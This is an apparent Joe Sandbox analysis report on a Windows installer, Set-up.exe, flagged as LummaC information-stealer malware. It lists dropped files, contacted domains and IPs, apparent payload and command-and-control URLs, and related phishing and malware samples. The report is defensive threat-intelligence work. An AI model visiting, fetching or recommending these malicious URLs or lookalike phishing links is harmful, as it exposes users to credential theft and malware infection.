              | C:\Users\user\AppData\Local\Temp\is-DNDCK.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Temp\is-DNDCK.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy) | 8% | ReversingLabs | | |
              | C:\Users\user\AppData\Roaming\ColorStreamLib\is-F9S0P.tmp | 8% | ReversingLabs | | |
              No Antivirus matches
              No Antivirus matches
              | Source | Detection | Scanner | Label | Link |
              | --- | --- | --- | --- | --- |
              | https://laborersquei.click/apis | 0% | Avira URL Cloud | safe | |
              | https://klipvumisui.shop/Lm | 100% | Avira URL Cloud | malware | |
              | https://laborersquei.click/lm | 0% | Avira URL Cloud | safe | |
              | https://laborersquei.click/apiy | 0% | Avira URL Cloud | safe | |
              | https://cegu.shop:443/8574262446/ph.txt | 100% | Avira URL Cloud | malware | |
              | https://laborersquei.click/ | 0% | Avira URL Cloud | safe | |
              | https://klipvumisui.shop/int_clp_sha.txtt | 100% | Avira URL Cloud | malware | |
              | https://laborersquei.click/api) | 0% | Avira URL Cloud | safe | |
              | https://laborersquei.click/apite | 0% | Avira URL Cloud | safe | |
              | https://laborersquei.click/api. | 100% | Avira URL Cloud | malware | |
              | http://crl.microsoftc | 0% | Avira URL Cloud | safe | |
              | https://laborersquei.click/-- | 0% | Avira URL Cloud | safe | |
              | https://laborersquei.click/apib | 0% | Avira URL Cloud | safe | |
              | https://laborersquei.click/api | 100% | Avira URL Cloud | malware | |
              | https://laborersquei.click/c | 0% | Avira URL Cloud | safe | |
              | https://cegu.shop/Tj | 100% | Avira URL Cloud | malware | |
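              | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
              | --- | --- | --- | --- | --- | --- |
              | cegu.shop | 185.161.251.21 | true | false | | high |
              | laborersquei.click | 188.114.96.3 | true | false | | high |
              | klipvumisui.shop | 104.21.37.128 | true | false | | high |
              | dfgh.online | unknown | unknown | false | | high |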
              | Name | Malicious | Antivirus Detection | Reputation |
              | --- | --- | --- | --- |
              | https://klipvumisui.shop/int_clp_sha.txt | false | | high |
              | https://cegu.shop/8574262446/ph.txt | false | | high |
              | https://laborersquei.click/api | true | Avira URL Cloud: malware | unknown |
              | Name | Source | Malicious | Antivirus Detection | Reputation |
              | --- | --- | --- | --- | --- |
              | https://cegu.shop:443/8574262446/ph.txt | Set-up.exe memory dumps | false | Avira URL Cloud: malware | unknown |
              | https://duckduckgo.com/chrome_newtab | Set-up.exe memory dumps | false | | high |
              | https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | Set-up.exe memory dumps | false | | high |
              | https://certs.securetrust.com/CA0: | Set-up.exe memory dumps | false | | high |
              | https://duckduckgo.com/ac/?q= | Set-up.exe memory dumps | false | | high |
              | http://ocsp.vikingcloud.com/0A | Set-up.exe memory dumps | false | | high |
              | http://crl.microsoft | Set-up.exe memory dumps | false | | high |
                                      https://klipvumisui.shop/LmSet-up.exe, 00000000.00000003.2300627887.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312625508.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300945693.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2301046960.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://certs.securetrust.com/issuers/TWGCA.crt0Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://ocsp.vikingcloud.com/0:Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://dfgh.online/invoker.php?compName=powershell.exe, 00000003.00000002.2252728333.0000000004090000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://laborersquei.click/apisSet-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2215607155.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312115290.000000000077B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://laborersquei.click/apiteSet-up.exe, 00000000.00000003.2195047189.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2184622292.0000000000779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://laborersquei.click/apiySet-up.exe, 00000000.00000003.2215607155.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312115290.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://crl.vikingcloud.com/TWGCA.crl0tSet-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://laborersquei.click/Set-up.exe, 00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2215607155.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2173757711.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2195047189.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2194970895.000000000353A000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2184587220.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2195003409.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2131714421.00000000007A3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312115290.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://certs.securetrust.com/CA05Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://laborersquei.click/api)Set-up.exe, 00000000.00000003.2195047189.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://laborersquei.click/lmSet-up.exe, 00000000.00000003.2184587220.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2195003409.00000000007E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://x1.c.lencr.org/0Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://x1.i.lencr.org/0Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSet-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://laborersquei.click/api.Set-up.exe, 00000000.00000003.2131714421.0000000000779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://klipvumisui.shop/int_clp_sha.txttSet-up.exe, 00000000.00000003.2300627887.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300945693.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312557136.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://certs.securetrust.com/CA0Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.microsoft.cSet-up.exe, 00000000.00000003.2173803382.0000000000792000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2174167112.0000000000792000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://support.mozilla.org/products/firefoxgro.allSet-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://crl.trustwave.com/TWGCA.crl0nSet-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoSet-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://crl.securetrust.com/TWGCSCA_L1.crl0ySet-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://laborersquei.click/--Set-up.exe, 00000000.00000003.2131714421.0000000000779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://cegu.shop/TjSet-up.exe, 00000000.00000003.2215482777.00000000007D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://ocsp.rootca1.amazontrust.com0:Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.ecosia.org/newtab/Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSet-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://crl.microsoftcSet-up.exe, 00000000.00000003.2173803382.0000000000792000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2195047189.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2174167112.0000000000792000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2131714421.00000000007A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://ac.ecosia.org/autocomplete?q=Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://laborersquei.click/apibSet-up.exe, 00000000.00000003.2131714421.00000000007A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://laborersquei.click/cSet-up.exe, 00000000.00000003.2215853185.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2215482777.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300627887.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312625508.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300945693.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2301046960.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://ocsp.securetrust.com/0?Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.37.128 | klipvumisui.shop | United States | 13335 | CLOUDFLARENETUS | false
188.114.96.3 | laborersquei.click | European Union | 13335 | CLOUDFLARENETUS | false
185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582492
Start date and time: 2024-12-30 18:12:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 37
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Set-up.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@59/15@4/3
EGA Information:
• Successful, ratio: 33.3%
HCA Information: Failed
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Execution Graph export aborted for target BrightLib.exe, PID 5860 because there are no executed function
                                                                                            • Execution Graph export aborted for target powershell.exe, PID 3868 because it is empty
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            • VT rate limit hit for: Set-up.exe
Time | Type | Description
12:13:09 | API Interceptor | 9x Sleep call for process: Set-up.exe modified
12:13:20 | API Interceptor | 17x Sleep call for process: powershell.exe modified
12:14:18 | API Interceptor | 1x Sleep call for process: BrightLib.exe modified
                                                                                                    • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                    185.161.251.21installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                      @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                        Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                          MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                            installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                  Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    appFile.exeGet hashmaliciousLummaC StealerBrowse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                      cegu.shopinstaller_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      laborersquei.clickinstaller_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 172.67.166.49
                                                                                                                      !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.89.250
                                                                                                                      @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.166.49
                                                                                                                      installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                                      • 172.67.166.49
                                                                                                                      SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.89.250
                                                                                                                      klipvumisui.shopinstaller_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.208.58
                                                                                                                      @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.208.58
                                                                                                                      installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.208.58
                                                                                                                      Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.37.128
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                      CLOUDFLARENETUSsetup.msiGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.0.151
                                                                                                                      https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                                                                                                                      • 104.17.25.14
                                                                                                                      random.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.64.143
                                                                                                                      https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857Get hashmaliciousKnowBe4Browse
                                                                                                                      • 104.18.87.62
                                                                                                                      BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 172.64.41.3
                                                                                                                      UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.96.1
                                                                                                                      PI1EA8P74K.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.148.118
                                                                                                                      https://aiihsr.com/FloridaCUGet hashmaliciousUnknownBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      https://flowto.it/8tooc2sec?fc=0Get hashmaliciousUnknownBrowse
                                                                                                                      • 104.18.35.227
                                                                                                                      NTLGBbotx.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 82.31.53.184
                                                                                                                      botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 62.31.100.59
                                                                                                                      loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 82.37.70.27
                                                                                                                      loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 82.42.160.251
                                                                                                                      loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 163.164.159.5
                                                                                                                      sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                      • 86.17.1.166
                                                                                                                      x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                      • 82.16.218.110
                                                                                                                      installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 185.161.251.21
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1random.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21
                                                                                                                      UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21
                                                                                                                      PI1EA8P74K.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21
                                                                                                                      eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21
                                                                                                                      PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21
                                                                                                                      universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21
                                                                                                                      Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21
                                                                                                                      universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21
                                                                                                                      6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
